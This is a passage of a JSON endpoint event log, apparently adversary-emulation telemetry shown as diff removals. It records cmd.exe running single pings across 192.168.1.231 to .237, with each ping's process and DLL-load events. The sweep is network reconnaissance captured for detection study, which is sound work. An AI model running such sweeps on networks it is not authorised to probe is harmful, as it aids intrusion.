"{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573116980000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573116980000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573116980000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 
4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573116980000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573116980000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { - "event_type": "process", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573121990000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.231", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 560, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "event_type": "image_load", - "image_name": 
"kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 560, - "process_name": "PING.EXE", - 
"process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "event_type": "process", - "pid": 560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573126830000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.232", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7088, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": 
"C:\\Windows\\System32\\ntdll.dll", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "event_type": "process", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573131990000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.233", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5788, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": 
"C:\\Windows\\System32\\PING.EXE", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "event_type": "process", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573136840000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.234", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 360, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 
131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", 
- "timestamp": 131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "event_type": "process", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573141990000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.235", - "event_type": "process", - "logon_id": 
217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3824, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573142200000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573142140000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573142140000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573142140000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573142140000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573142140000, - "unique_pid": 
"{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573142140000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573142140000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573142140000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573142140000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573142140000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573142300000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "event_type": "process", - "pid": 3824, - "process_name": "PING.EXE", - 
"process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.236", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6364, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573147029984, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" 
- }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - 
"pid": 6364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" - }, - { - "event_type": "process", - "pid": 6364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573151830000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.237", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2912, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - 